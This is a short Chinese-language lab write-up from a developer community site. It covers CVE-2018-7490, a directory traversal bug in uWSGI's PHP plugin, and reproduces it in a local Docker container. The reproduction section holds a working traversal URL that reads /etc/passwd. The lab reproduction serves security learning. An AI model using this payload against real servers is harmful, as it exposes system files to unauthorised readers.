AI 助理
备案控制台
开发者社区 开发与运维 文章 正文

CVE-2018-7490 uWSGI PHP目录穿越漏洞

2022-12-02 569
版权
版权声明:
本文内容由阿里云实名注册用户自发贡献,版权归原作者所有,阿里云开发者社区不拥有其著作权,亦不承担相应法律责任。具体规则请查看《 阿里云开发者社区用户服务协议》和 《阿里云开发者社区知识产权保护指引》。如果您发现本社区中有涉嫌抄袭的内容,填写 侵权投诉表单进行举报,一经查实,本社区将立刻删除涉嫌侵权内容。
简介: CVE-2018-7490 uWSGI PHP目录穿越漏洞

漏洞简介

uWSGI是一款Web应用程序服务器,它实现了WSGI、uwsgi和http等协议,并支持通过插件来运行各种语言。

uWSGI 2.0.17之前的PHP插件,没有正确的处理DOCUMENT_ROOT检测,导致用户可以通过..%2f来跨越目录,读取或运行DOCUMENT_ROOT目录以外的文件。

漏洞复现

运行存在漏洞的uWSGI服务器:

docker-compose up -d

运行完成后,访问http://your-ip:8080/即可看到phpinfo信息,说明uwsgi-php服务器已成功运行。

漏洞复现

http://127.0.0.1:8080/..%2f..%2f..%2f..%2f..%2fetc/passwd

访问http://your-ip:8080/..%2f..%2f..%2f..%2f..%2fetc/passwd,成功读取文件:

文章标签:
PHP
安全
关键词:
PHP目录
PHP漏洞
Uwsgi目录
Uwsgi漏洞
PHP目录漏洞
5q2a2sugf4ej6
目录
相关文章
贵哥的编程之路(热爱分享)
|
5月前
|
PHP
php案例 :显示目录信息
php案例 :显示目录信息
贵哥的编程之路(热爱分享)
40 0
php案例 :显示目录信息
GG2020gg
|
2月前
|
SQL 安全 API
PHP代码审计示例(一)——淡然点图标系统SQL注入漏洞审计
PHP代码审计示例(一)——淡然点图标系统SQL注入漏洞审计
GG2020gg
73 4
今天是几号
|
4月前
|
安全 前端开发 测试技术
安全开发-PHP应用&模版引用&Smarty渲染&MVC模型&数据联动&RCE安全&TP框架&路由访问&对象操作&内置过滤绕过&核心漏洞
安全开发-PHP应用&模版引用&Smarty渲染&MVC模型&数据联动&RCE安全&TP框架&路由访问&对象操作&内置过滤绕过&核心漏洞
今天是几号
38 0
土木林森
|
5月前
|
存储 缓存 PHP
【PHP开发专栏】PHP文件操作与目录管理
【4月更文挑战第30天】本文介绍了PHP中的文件操作和目录管理。内容涵盖文件的打开、关闭、读写、删除及状态检测,如`fopen`、`fclose`、`fread`、`fwrite`、`file_get_contents`等函数。此外,还涉及文件高级操作如锁定和指针操作。在目录管理方面,讲解了创建、删除目录及读取目录内容的函数,如`mkdir`、`rmdir`、`scandir`等。通过示例代码展示了如何在实践中应用这些函数。理解这些基础知识对处理文件系统相关问题至关重要。
土木林森
62 1
土木林森
|
5月前
|
安全 PHP 数据库
【PHP开发专栏】PHP文件包含漏洞与防范
【4月更文挑战第30天】本文探讨了PHP文件包含漏洞,该漏洞让攻击者能执行恶意代码或访问敏感信息。文章分为三部分:原理、影响和防范。文件包含函数(如`include`和`require`)在攻击者控制文件名时可能导致漏洞。影响包括执行恶意代码、泄露敏感信息和影响服务器性能。防范措施包括验证文件名安全性、使用安全包含函数、设置安全包含路径和参数,以及定期更新和维护代码及库。开发者应重视此问题,采取相应措施保障应用安全。
土木林森
124 0
疯狂的猿
|
5月前
|
安全 PHP
零基础学习挖掘PHP网站漏洞
本套课程,分为三个阶段:第一阶段:基础篇 学习PHP开发的基础知识,对PHP常见的漏洞进行分析,第二阶段:进阶篇 实战PHP漏洞靶场,了解市面上的PHP主流网站开发技术,并对市面上的主流框架进行漏洞分析,第三阶段:高级篇 实战演示PHP代码审计技术,并能手动开发PHP框架,了解大型网站的核心技术!
疯狂的猿
55 2
GG2020gg
|
5月前
|
运维 Linux Apache
LAMP架构调优(十)——Apache禁止指定目录PHP解析与错误页面优化
LAMP架构调优(十)——Apache禁止指定目录PHP解析与错误页面优化
GG2020gg
277 2
贵哥的编程之路(热爱分享)
|
5月前
|
PHP
php案例 往某个目录下创建文件并写入数据
php案例 往某个目录下创建文件并写入数据
贵哥的编程之路(热爱分享)
62 0
php案例 往某个目录下创建文件并写入数据
贵哥的编程之路(热爱分享)
|
5月前
|
PHP
php案例:创建日期时间目录
php案例:创建日期时间目录
贵哥的编程之路(热爱分享)
44 0
php案例:创建日期时间目录
贵哥的编程之路(热爱分享)
|
5月前
|
PHP
php案例:用代码的方式创建目录+文件+写入数据(都由你定)
php案例:用代码的方式创建目录+文件+写入数据(都由你定)
贵哥的编程之路(热爱分享)
54 0
php案例:用代码的方式创建目录+文件+写入数据(都由你定)

热门文章

最新文章

  • 1
    启动uwsgi报错:ImportError: No module named django.core.wsgi
  • 2
    阿里云centos部署Django+nginx+uwsgi服务,安装mezzanine为例
  • 3
    调优UWSGI,后台启动,热更改PY,杜绝502
  • 4
    深入理解uwsgi和gunicorn网络模型
  • 5
    Nginx + uWSGI + Python + Django部署实例
  • 6
    基于Nginx 和 uwsgi 搭建 Django部署上线环境
  • 7
    uwsgi启动 重启 停止 & 启动和停止nginx服务器
  • 8
    CentOS7 + Python3 + Django(rest_framework) + MariaDB + nginx + uwsgi 部署 API 开发环境
  • 9
    Django Nginx+uwsgi 安装配置
  • 10
    在UWSGI和NGINX配合的情况下,配置个别目录上传及超时
  • 1
    PHP医院安全不良事件管理系统源码(AEMS)前端vue2+element+后端laravel8不良事件上报与闭环管理
    72
  • 2
    深入理解PHP的命名空间与自动加载机制
    48
  • 3
    深入理解PHP的命名空间和自动加载机制
    29
  • 4
    网安之PHP基础练习
    32
  • 5
    1688快速获取整店铺列表 采集接口php Python
    45
  • 6
    PHP基于B/S版 医院不良事件管理系统源码vscode+laravel8医院如何加强不良事件上报系统的管理 AEMS系统源码
    61
  • 7
    【PHP入门】2.2 流程控制
    50
  • 8
    【PHP入门】2.1-运算符
    35
  • 9
    【PHP入门】1.3-数据类型、转换、判断
    49
  • 10
    【PHP入门】1.2-常量与变量
    53

    • 相关课程

    更多
  • PHP进阶教程 - 由浅入深掌握面向对象开发 - 第二阶段
  • PHP完全自学手册文档教程
  • Linux Web服务器Nginx搭建与配置

    • 相关电子书

    更多
  • 阿里云栖开发者沙龙PHP技术专场-直面PHP微服务架构挑战-高驰涛
  • PHP安全开发:从白帽角度做安全
  • PHP 2017.北京 全球开发者大会——高可用的PHP

    • 相关实验场景

    更多
  • 1分钟SAE部署PHP商城小程序
  • 10分钟Serverless部署PHP商城
    • 下一篇
    AI助理直击要害,从繁复中提炼精华——使用CDN加速访问OSS存储的图片